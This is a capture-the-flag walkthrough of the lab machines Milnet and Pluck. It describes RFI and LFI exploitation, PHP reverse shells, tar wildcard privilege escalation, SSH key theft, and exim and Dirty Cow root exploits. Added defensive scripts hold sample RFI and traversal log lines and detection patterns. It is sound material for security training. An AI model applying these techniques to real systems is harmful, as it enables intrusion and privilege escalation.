Wednesday, September 26, 2018



- Layout for this exercise:


- The goal of this exercise is to develop a hacking process for the vulnerable machine Milnet.

- Milnet can be downloaded from here:,148/

- Once downloaded and extracted with VMware:

- Milnet shows that its IP is


- Confirming that the IP is with netdiscover:

- Scanning with Nmap:

- Scanning the HTTP server in depth:

- nikto helps to enumerate the web server; for instance, we learn about the existence of the page info.php:

- Connecting to the web application:

- From info.php we learn that the directives allow_url_fopen and allow_url_include are On, which could lead to a potential RFI (Remote File Inclusion) vulnerability:

- Testing Milnet with OWASP ZAP, we confirm the existence of the RFI, specifically at the page content.php in the parameter route.


- The next step will be to exploit Milnet by taking advantage of the RFI vulnerability at the page content.php, for instance by uploading and remotely executing a reverse shell exploit like the well-known php-reverse-shell provided by Kali:

- Adapting the exploit to our needs and renaming it to myshell:

- Now, with the purpose of uploading and executing myshell remotely on Milnet, let's open a connection with Burp.

- For instance, from the three available tabs of the navigation menu, let's access Main:

- Intercepting the connection with Burp we detect the presence of the route parameter:

- Opening a web server on port 8000, so that myshell can be uploaded from Kali to Milnet:

- Setting up a Netcat listening session on port 4444:

- Now, let's change the route parameter to point to our PHP reverse shell, and then click Forward in Burp:

- myshell is successfully uploaded and executed on Milnet:

- Let's notice that the web application adds the extension .php by default; that is the reason why we renamed the exploit to just myshell (without .php), otherwise we would be uploading something like myshell.php.php.

- Anyway, the consequence is a successful limited remote shell:


- Exploring Milnet we find the folder langman:

- Going into SDINET there are a lot of text files related to Information Security:

- Exploring crontab we find a backup script, run (with root privileges!!) every minute:

- Reading the script we learn that /var/www/html is packed with tar and compressed in .tgz format:

- However, let's notice that the tar command ends with a suspicious wildcard *

- The tar command can use the wildcard * for different purposes:

- It reminds us that one of the Information Security text files present at /home/langman is actually titled with wildcard * related information:

- Actually the document is public:

- Reading this document we learn an interesting way to escalate privileges. Going to the tar section, 4.3:

- The document even provides an example:

- Now, let's try to replicate this example on our vulnerable machine Milnet.

- Going to /var/www/html:

- Creating these 3 files:

- The purpose of the script is to change (or update) the root password to abcd, using the command chpasswd:

- Now, these 3 files are part of the folder /var/www/html, and all of them are going to be archived with tar every minute, according to the crontab task:

- Waiting one minute until the cron task is run, we can successfully connect to Milnet via SSH using root:abcd as credentials:

- Finally we have achieved a remote root shell.
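The root shell above came from a cron job that runs tar with a bare wildcard, so the shell expands whatever filenames exist in /var/www/html into tar's argument list. The following shell script is an added example, not from the original post or the Milnet VM: the first function audits crontab lines for that pattern (the sample entries are constructed), and the second shows the backup invocation a defender would use instead, with tar changing into the directory itself and archiving "." so that no filename ever becomes an argument. The temporary directory and the oddly named file in the self-check are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original post): audit cron entries for a tar
# command whose argument list ends in a bare shell wildcard, and show a
# backup invocation that does not let filenames become tar arguments.

# Constructed sample crontab entries (assumed content, not the VM's real file).
SAMPLE_CRON='* * * * * root cd /var/www/html && tar -zcf /var/backups/html.tgz *
0 2 * * * root tar -zcf /var/backups/etc.tgz -C /etc .
30 3 * * * root /usr/local/bin/rotate-logs.sh'

# Return 0 when the line runs tar with an unquoted * as a trailing argument
# (the shell expands that * into whatever names exist in the directory).
is_wildcard_tar() {
    printf '%s\n' "$1" | grep -Eq '(^|[[:space:]])tar[^|;&]*[[:space:]]\*([[:space:]]|$)'
}

# Count risky entries in the sample crontab; prints the number.
count_wildcard_tar_entries() {
    n=0
    while IFS= read -r line; do
        if is_wildcard_tar "$line"; then n=$((n + 1)); fi
    done <<EOF
$SAMPLE_CRON
EOF
    echo "$n"
}

# Hardened backup: tar changes into the source directory itself and archives
# ".", so the shell never expands filenames into the argument list; "--"
# ends option parsing for anything that follows.
safe_backup() {
    tar -zcf "$2" -C "$1" -- .
}

# Self-check in a temporary tree: a file whose name looks like an option is
# stored as an ordinary archive member. Prints how many entries match it.
demo_safe_backup() {
    tmp=$(mktemp -d)
    mkdir "$tmp/site"
    printf '<html></html>\n' > "$tmp/site/index.html"
    : > "$tmp/site/--version"            # constructed oddly named file
    safe_backup "$tmp/site" "$tmp/html.tgz"
    n=$(tar -tzf "$tmp/html.tgz" | grep -c -- '--version')
    rm -rf "$tmp"
    echo "$n"
}

count_wildcard_tar_entries   # prints 1 for the sample above
demo_safe_backup             # prints 1: the odd name is just a member
```

The audit regex only catches the simplest form (tar followed, before any `|`, `;` or `&`, by a bare `*`); a wildcard inside a subshell or a variable would need a manual review of the script the cron entry calls. The same `-C dir -- .` form works for any archiver that expands its own file list, which is the point: the fix is to stop the shell from globbing, not to sanitize the web root.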

- An alternative script would be to assign sudoers privileges with no password to the user www-data:

- Now we can get another remote root shell in this way:


- Reading credits.txt:



- Layout for this exercise:


- The goal of this exercise is to develop a hacking process for the vulnerable machine Pluck.

- Pluck can be downloaded from here:,178/

- Once downloaded, extracted and imported into VirtualBox:


- Using netdiscover let's confirm that the IP is

- Scanning with nmap:

- Browsing the web server:

- nikto helps discover a very promising LFI (Local File Inclusion) vulnerability in the web application:

- Let's check that the LFI works, for instance by reading /etc/passwd:
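The RFI exploited earlier on Milnet's content.php (route parameter) and the LFI found here on Pluck leave the same kind of trace in a web server's access log: a query parameter carrying a remote URL, or a directory traversal sequence. The following shell script is an added example, not part of the original post or of either VM. It classifies log lines as rfi, lfi or clean by decoding the traversal-relevant percent-encodings and inspecting the query string. The log lines are constructed samples in Apache combined format; the parameter name page and all addresses are assumptions used for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): scan web server access logs
# for query parameters that carry a remote URL (remote file inclusion) or
# a directory traversal sequence (local file inclusion).

# Constructed sample log lines in Apache combined format (not real traffic).
SAMPLE_LOG='10.0.0.5 - - [26/Sep/2018:10:00:01 +0000] "GET /content.php?route=main HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [26/Sep/2018:10:00:07 +0000] "GET /content.php?route=http://10.0.0.9:8000/myshell HTTP/1.1" 200 73 "-" "curl/7.61"
10.0.0.9 - - [26/Sep/2018:10:00:12 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1401 "-" "curl/7.61"
10.0.0.9 - - [26/Sep/2018:10:00:15 +0000] "GET /index.php?page=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1401 "-" "curl/7.61"
10.0.0.7 - - [26/Sep/2018:10:00:20 +0000] "GET /index.php?page=about HTTP/1.1" 200 300 "-" "Mozilla/5.0"'

# Pull the request target (path plus query) out of a combined-format line;
# prints nothing for a line with no request section.
request_target() {
    printf '%s\n' "$1" | sed -n 's/.*"[A-Z]* \([^ ]*\) HTTP\/[0-9.]*".*/\1/p'
}

# Decode only the percent-encodings that matter for traversal checks
# (".", "/" and "\") and fold to lower case; a full URL decoder is out of
# scope for this example.
normalize() {
    printf '%s\n' "$1" | sed 's/%2[eE]/./g; s/%2[fF]/\//g; s/%5[cC]/\\/g' | tr 'A-Z' 'a-z'
}

# Classify one log line: prints "rfi", "lfi" or "clean".
classify_line() {
    target=$(request_target "$1")
    query=${target#*\?}
    if [ "$query" = "$target" ]; then echo clean; return; fi   # no query string
    q=$(normalize "$query")
    case "$q" in
        *=http://*|*=https://*|*=ftp://*|*=php://*|*=data:*) echo rfi ;;
        *../*|*..\\*) echo lfi ;;
        *) echo clean ;;
    esac
}

# Count suspicious lines in the sample log; prints "<rfi count> <lfi count>".
scan_sample_log() {
    rfi=0; lfi=0
    while IFS= read -r line; do
        case "$(classify_line "$line")" in
            rfi) rfi=$((rfi + 1)) ;;
            lfi) lfi=$((lfi + 1)) ;;
        esac
    done <<EOF
$SAMPLE_LOG
EOF
    echo "$rfi $lfi"
}

scan_sample_log   # prints "1 2" for the sample above
```

In production the same classification belongs in the log pipeline rather than a one-off script, and the remote-URL check should be paired with the configuration fix the Milnet section points at: with allow_url_include off, a URL in an include parameter is a failed attempt worth alerting on rather than a working shell.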

- From /etc/passwd we learn that there are users like bob, peter, paul, backup-user, ...

- Also, reading the last line, it seems that there is a script for performing backups:

- Taking advantage of the LFI to read the script:

- The backup script tells us three things:

  • backups can be transferred with TFTP
  • the compressed backup file is located at /backups/backup.tar
  • both folders /home and /var/www/html are usually backed up

- Obviously, our next goal must be to download backup.tar


3.1 - Local File Inclusion

- Trying to get backup.tar using the browser and taking advantage of the LFI is a little bit messy, due to the huge size of the file:

- tftp does a better job:

- Also, curl would be a good alternative:

- Opening backup.tar:

- Now we have Pluck's backup folders available at our Kali machine:

- Searching for information inside bob and peter's home folders, there is nothing out of the ordinary:

- However, we find a collection of 6 private and public keys inside paul's home folder:

- Checking what type of files these keys are: they are valid for SSH connections:

- Now, we can use these keys with the option -i identity_file to establish SSH connections:

- First attempt with id_key1 is unsuccessful:

- Same thing with id_key2 and id_key3:

- However, id_key4 leads to a Pdmenu:

- Pdmenu is a simple menu program that displays a menu from which the user can pick programs to run, for instance to edit files:

3.2 - Limited remote shell with PHP reverse shell

- Now, using Pdmenu we are going to remotely create a file called myshell.php in the /home/paul folder, just by adapting the well-known PHP script php-reverse-shell.php to our needs:

- Editing remotely with Pdmenu the file /home/paul/myshell.php and copying into it the content of the local myshell.php:

- Let's notice that the text editor is vim, so we save the file by writing and quitting with :wq!

- Now, it is time to start the actual exploitation, first by setting up a listening nc session, and second by running myshell.php with curl:

- The exploitation is successful and we get a limited remote shell:

3.3 - Limited remote shell with VIM and external commands

- As an alternative, now we are going to use Pdmenu to insert the command /bin/bash in the Vim editor, following these directions:

- Simply quitting Vim and Pdmenu brings us back to a limited remote shell:


4.1 - Local Privilege Escalation with exim-4.84.7 exploit

- Finding the SUID files that exist on the system, we discover exim-4.84-7:

- Exim (current version 4.91) is an SMTP email message transfer agent (MTA) for use on Unix systems under the GPL, similar in style to Smail 3.

- Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument:

- There is a Local Privilege Escalation exploit related to this vulnerability:

- Copying the script to a new file:

- Transferring from Kali to Pluck, specifically to /tmp folder:

- The transfer is successful, but the file has no execution permissions:

- Giving execution permissions to

- Running the script, we finally get a remote root shell:
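The setuid exim binary was found above by listing SUID files on the host. The defensive counterpart is to keep a baseline of the setuid binaries that are expected on a system and alert on any that appear outside it, which catches both an unexpected package like this one and a binary an intruder leaves behind. The following shell functions are an added example, not from the original post or the Pluck VM; the temporary directory tree and the baseline list in the self-check are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original post): inventory setuid files under a
# tree and report those missing from a baseline list.

# List setuid regular files under a directory tree, one path per line,
# sorted so the result can be compared with comm(1). -xdev stays on one
# filesystem, which avoids descending into /proc and mounted media.
list_setuid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Print paths that are setuid now but absent from the baseline file ($2,
# one sorted path per line). An empty result means nothing changed.
new_setuid() {
    list_setuid "$1" | comm -13 "$2" -
}

# Self-contained demonstration in a temporary tree: one setuid file recorded
# in the baseline and one that is not; prints only the unexpected path.
demo_new_setuid() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/bin" "$tmp/opt"
    printf '#!/bin/sh\n' > "$tmp/bin/known"
    printf '#!/bin/sh\n' > "$tmp/opt/unexpected"
    chmod 4755 "$tmp/bin/known" "$tmp/opt/unexpected"   # constructed setuid files
    printf '%s\n' "$tmp/bin/known" > "$tmp/baseline.txt"
    new_setuid "$tmp" "$tmp/baseline.txt"
    rm -rf "$tmp"
}

demo_new_setuid   # prints the path ending in /opt/unexpected
```

On a real host the baseline is `list_setuid / > /var/lib/setuid-baseline.txt` taken right after installation, re-generated after package upgrades, and `new_setuid / /var/lib/setuid-baseline.txt` run from cron with any non-empty output treated as an alert. Pair it with mounting user-writable locations such as /tmp with nosuid, so a setuid file dropped there does not gain privileges even before the scan runs.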

4.2 - Local Privilege Escalation with Dirty Cow Kernel Exploit

- An alternative to the method explained in 4.1 would be to use this exploit:

- Downloading to Kali:

- Transferring to Pluck:

- Compiling:

- Running cowroot we get a remote root shell:

- Apparently cowroot destabilizes the system, so we follow these directions to achieve a more stable shell:


- Reading flag.txt: